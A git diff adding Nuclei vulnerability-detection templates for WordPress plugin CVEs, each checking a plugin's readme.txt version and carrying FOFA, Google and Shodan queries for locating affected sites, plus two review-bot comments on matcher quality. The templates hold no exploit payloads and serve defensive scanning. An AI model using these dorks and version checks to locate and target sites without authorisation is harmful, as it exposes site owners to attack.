@@ -0,0 +1,59 @@ +id: CVE-2024-43284 + +info: + name: > + WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Travel Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43284 + metadata: + fofa-query: "wp-content/plugins/wp-travel-blocks/" + google-query: inurl:"/wp-content/plugins/wp-travel-blocks/" + shodan-query: 'vuln:CVE-2024-43284' + tags: cve,wordpress,wp-plugin,wp-travel-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-travel-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43288.yaml b/poc/cve/CVE-2024-43288.yaml new file mode 100644 index 0000000000..6a90551bc8 --- /dev/null +++ b/poc/cve/CVE-2024-43288.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43288 + +info: + name: > + wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43288 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43288' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43289.yaml b/poc/cve/CVE-2024-43289.yaml new file mode 100644 index 0000000000..fa9f6052ee --- /dev/null +++ b/poc/cve/CVE-2024-43289.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43289 + +info: + name: > + wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The wpForo Forum plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.4. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43289 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43289' + tags: cve,wordpress,wp-plugin,wpforo,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43292.yaml b/poc/cve/CVE-2024-43292.yaml new file mode 100644 index 0000000000..841ba8c4e9 --- /dev/null +++ b/poc/cve/CVE-2024-43292.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43292 + +info: + name: > + Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43292 + metadata: + fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43292' + tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envo-elementor-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43296.yaml b/poc/cve/CVE-2024-43296.yaml new file mode 100644 index 0000000000..b3092a87f7 --- /dev/null 
+++ b/poc/cve/CVE-2024-43296.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43296 + +info: + name: > + Flash & HTML5 Video <= 2.5.30 - Missing Authorization + author: topscoder + severity: low + description: > + The Flash & HTML5 Video plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in versions up to, and including, 2.5.30. This makes it possible for authenticated attackers, with subscriber-level access and above, to update views, create thumbnails, and more. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43296 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43296' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.30') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43303.yaml b/poc/cve/CVE-2024-43303.yaml new file mode 100644 index 0000000000..37ec25785f --- /dev/null +++ b/poc/cve/CVE-2024-43303.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43303 + +info: + name: > + White Label CMS <= 2.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The White Label CMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8069e16d-a68a-4c72-934f-f79e50777565?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43303 + metadata: + fofa-query: "wp-content/plugins/white-label-cms/" + google-query: inurl:"/wp-content/plugins/white-label-cms/" + shodan-query: 'vuln:CVE-2024-43303' + tags: cve,wordpress,wp-plugin,white-label-cms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/white-label-cms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "white-label-cms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43306.yaml b/poc/cve/CVE-2024-43306.yaml new file mode 100644 index 0000000000..e3a07bc0b4 --- /dev/null +++ b/poc/cve/CVE-2024-43306.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43306 + +info: + name: > + WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Lister Lite for eBay plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43306 + metadata: + fofa-query: "wp-content/plugins/wp-lister-for-ebay/" + google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/" + shodan-query: 'vuln:CVE-2024-43306' + tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-lister-for-ebay" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43307.yaml b/poc/cve/CVE-2024-43307.yaml new file mode 100644 index 0000000000..7947deb8bd --- /dev/null +++ b/poc/cve/CVE-2024-43307.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43307 + +info: + name: > + Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43307 + metadata: + fofa-query: "wp-content/plugins/structured-content/" + google-query: inurl:"/wp-content/plugins/structured-content/" + shodan-query: 'vuln:CVE-2024-43307' + tags: cve,wordpress,wp-plugin,structured-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "structured-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43308.yaml b/poc/cve/CVE-2024-43308.yaml new file mode 100644 index 0000000000..fe3a475cf8 --- /dev/null +++ b/poc/cve/CVE-2024-43308.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43308 + +info: + name: > + Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43308 + metadata: + fofa-query: "wp-content/plugins/gutentor/" + google-query: inurl:"/wp-content/plugins/gutentor/" + shodan-query: 'vuln:CVE-2024-43308' + tags: cve,wordpress,wp-plugin,gutentor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gutentor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43309.yaml b/poc/cve/CVE-2024-43309.yaml new file mode 100644 index 0000000000..1cb82b3803 --- /dev/null +++ b/poc/cve/CVE-2024-43309.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43309 + +info: + name: > + WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Telegram Widget and Join Link plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43309 + metadata: + fofa-query: "wp-content/plugins/wptelegram-widget/" + google-query: inurl:"/wp-content/plugins/wptelegram-widget/" + shodan-query: 'vuln:CVE-2024-43309' + tags: cve,wordpress,wp-plugin,wptelegram-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wptelegram-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.27') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43311.yaml b/poc/cve/CVE-2024-43311.yaml new file mode 100644 index 0000000000..3111d8327f --- /dev/null +++ b/poc/cve/CVE-2024-43311.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43311 + +info: + name: > + Login As Users <= 1.4.2 - Authentication Bypass + author: topscoder + severity: critical + description: > + The Login As Users plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.2. This is due to the plugin not properly verifying that a user switching back to a user is authorized to do so. This makes it possible for unauthenticated attackers to access other users accounts which can be administrators. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43311 + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:CVE-2024-43311' + tags: cve,wordpress,wp-plugin,login-as-users,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43313.yaml b/poc/cve/CVE-2024-43313.yaml new file mode 100644 index 0000000000..6214149fd1 --- /dev/null +++ b/poc/cve/CVE-2024-43313.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43313 + +info: + name: > + FormFacade <= 1.3.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The FormFacade – WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirectURL' parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d0166c9-1349-45df-9e0f-ff4bc1a67c73?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43313 + metadata: + fofa-query: "wp-content/plugins/formfacade/" + google-query: inurl:"/wp-content/plugins/formfacade/" + shodan-query: 'vuln:CVE-2024-43313' + tags: cve,wordpress,wp-plugin,formfacade,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/formfacade/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formfacade" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43318.yaml b/poc/cve/CVE-2024-43318.yaml new file mode 100644 index 0000000000..d6192f2441 --- /dev/null +++ b/poc/cve/CVE-2024-43318.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43318 + +info: + name: > + e2pdf <= 1.25.05 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The e2pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.25.05 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f94a1671-11f8-4a05-b950-a068edf29f43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43318 + metadata: + fofa-query: "wp-content/plugins/e2pdf/" + google-query: inurl:"/wp-content/plugins/e2pdf/" + shodan-query: 'vuln:CVE-2024-43318' + tags: cve,wordpress,wp-plugin,e2pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/e2pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "e2pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.25.05') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43319.yaml b/poc/cve/CVE-2024-43319.yaml new file mode 100644 index 0000000000..a82622c375 --- /dev/null +++ b/poc/cve/CVE-2024-43319.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43319 + +info: + name: > + Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure + author: topscoder + severity: low + description: > + The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43319 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43319' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.31') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43321.yaml b/poc/cve/CVE-2024-43321.yaml new file mode 100644 index 0000000000..06ada2e77f --- /dev/null +++ b/poc/cve/CVE-2024-43321.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43321 + +info: + name: > + Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.22.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43321 + metadata: + fofa-query: "wp-content/plugins/team/" + google-query: inurl:"/wp-content/plugins/team/" + shodan-query: 'vuln:CVE-2024-43321' + tags: cve,wordpress,wp-plugin,team,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/team/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "team" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.22.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43322.yaml b/poc/cve/CVE-2024-43322.yaml new file mode 100644 index 0000000000..6eee8716e4 --- /dev/null +++ b/poc/cve/CVE-2024-43322.yaml 
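Review bot: The `word` matcher here looks for the bare token `team` in the response body, which is too generic to act as a plugin check: any catch-all page served with a 200 is likely to contain it, and the template then depends entirely on the `Stable tag` regex failing to avoid a false positive. The same applies to `tutor` in CVE-2024-43282. A token that only the plugin's own readme would carry (the plugin name as it appears in the readme's title line, or the full plugin name from `name`) would make the `and` condition meaningful; the exact readme title is not visible here, so the replacement value needs to be taken from the actual readme.txt.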
@@ -0,0 +1,59 @@
+id: CVE-2024-43322
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The Zephyr Project Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.100 via the updateTaskStatus() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to edit task statuses that do not belong to them.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43322
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:CVE-2024-43322'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.100')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43327.yaml b/poc/cve/CVE-2024-43327.yaml
new file mode 100644
index 0000000000..ed6825ee43
--- /dev/null
+++ b/poc/cve/CVE-2024-43327.yaml
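Review bot: `description` says the IDOR is reachable by "unauthenticated attackers", while `name` says "Authenticated (Subscriber+)" and `cvss-metrics` carries `PR:L`; the three statements cannot all be right, and whoever triages the finding has no way to tell from the template which privilege level actually applies. The Wordfence entry under `reference` should settle it; if the CVSS vector is the authoritative one, the description should read `for authenticated attackers, with Subscriber-level access and above, to edit task statuses` so it agrees with the name.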
@@ -0,0 +1,59 @@
+id: CVE-2024-43327
+
+info:
+ name: >
+ Invite Anyone <= 1.4.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Invite Anyone plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b02613dc-8c31-4c86-b800-eb1039381e1f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43327
+ metadata:
+ fofa-query: "wp-content/plugins/invite-anyone/"
+ google-query: inurl:"/wp-content/plugins/invite-anyone/"
+ shodan-query: 'vuln:CVE-2024-43327'
+ tags: cve,wordpress,wp-plugin,invite-anyone,medium
+
+http:
+ - method: GET
+ redirects: true
